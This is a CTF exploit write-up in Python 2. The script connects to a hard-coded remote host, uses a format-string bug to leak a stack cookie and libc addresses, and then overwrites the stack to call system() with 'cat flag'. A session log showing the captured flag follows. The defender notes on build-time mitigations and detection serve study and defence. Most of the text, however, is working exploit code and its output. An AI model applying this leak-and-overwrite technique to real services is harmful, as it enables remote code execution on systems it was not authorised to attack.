# CTF exploit write-up (Python 2 script: print statements, str payloads).
# The target binary ("task" in the session log below) exposes a format-string
# bug on a logged-in text channel; the script uses it twice: first with
# positional `%N$08x` specifiers to leak three stack words, then with a
# crafted write to hand the process over to system().
#
# Defender notes: the leak/overwrite pattern here is what -Wformat-security
# and _FORTIFY_SOURCE (which rejects %n and positional-argument abuse) are
# meant to stop at build time; a NUL-free, leak-derived stack cookie and a
# leaked libc base show why ASLR and canaries alone do not close a
# user-controlled format string. Detection hint: a client sending strings
# full of `%..$x` / `%s` specifiers to a service that does not expect them.
import socket
import struct
HOST = '109.233.61.11'
PORT = 3129
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.recv(1024)  # discard the banner
# Log in
s.send("letmein\n")
s.recv(1024)  # discard the login response
# Get base address, stack cookie, stack address
# Three positional format specifiers leak three stack words as 8-hex-digit
# values separated by spaces; the trailing padding fixes the total length.
s.send("%79$08x %78$08x %10$08x " + "_" * 103 + "\n")
data = s.recv(1024)
# The subtracted constants are offsets between the leaked words and the
# binary base / frame start for this particular build — not general values.
base_address = int(data.split(" ")[0], 16) - 0xc10
stack_cookie = int(data.split(" ")[1], 16)
stack_address = int(data.split(" ")[2], 16) - 0x1a8
print "[*] Base address: %08x" % base_address
print "[*] Stack cookie: %08x" % stack_cookie
print "[*] Stack address: %08x" % stack_address
# libc symbol addresses derived from the binary base by fixed deltas; these
# are specific to the target's libc build and would differ elsewhere.
read_addr = base_address - 0xf5c60
sys_addr = read_addr - 0x9ef70
sys_addr_packed = struct.pack("<I", sys_addr)  # 32-bit little-endian
print "[*] read@libc: %08x" % read_addr
print "[*] system@libc: %08x" % sys_addr
stack_addr_packed = struct.pack("<I", stack_address + 288)
# NOTE(review): `| 0x41` presumably replaces the cookie's low byte (normally
# 0x00 on Linux) so the packed value carries no NUL — confirm against the
# binary's cookie check before relying on it.
stack_cookie_packed = struct.pack("<I", stack_cookie | 0x41)
# The first payload is dead code: the next line rebinds `payload` before it
# is used. Only the "cat flag" variant is ever sent.
payload = "%%0176x" + "_" * 80 + "%s" + "_" * 12 + "%s%s%s____ls -lsa;##\n"
payload = "%%0176x" + "_" * 80 + "%s" + "_" * 12 + "%s%s%s____cat flag;#\n"
# `%%` survives Python's %-formatting as a literal `%`, so the target sees
# `%0176x`; the four `%s` slots receive the packed cookie, system() twice
# and the stack address (order: cookie, system, system, stack).
s.send(payload % (stack_cookie_packed, sys_addr_packed, sys_addr_packed, stack_addr_packed))
s.recv(1024)
s.recv(1024)
# NOTE(review): the original paste lost its indentation; the loop body is
# assumed to be the three lines below (send one padded line, read the reply)
# with the final print after the loop — confirm against the source.
for x in range(13):
    payload_2 = "%0134x " + "_" * 120 + "\n"
    s.send(payload_2)
    s.recv(1024)
print s.recv(1024)
"""
$ ls -lsa
total 20
4 drwxr-xr-x 2 root root 4096 Feb 8 02:50 .
4 drwxr-xr-x 23 root root 4096 Feb 8 02:49 ..
4 -rw-r--r-- 1 root root 44 Feb 8 02:49 flag
8 -rwxr-xr-x 1 root root 5464 Feb 8 02:50 task
$ cat flag
CTF{c36d55681410edbba58daedde46fb5e8}
"""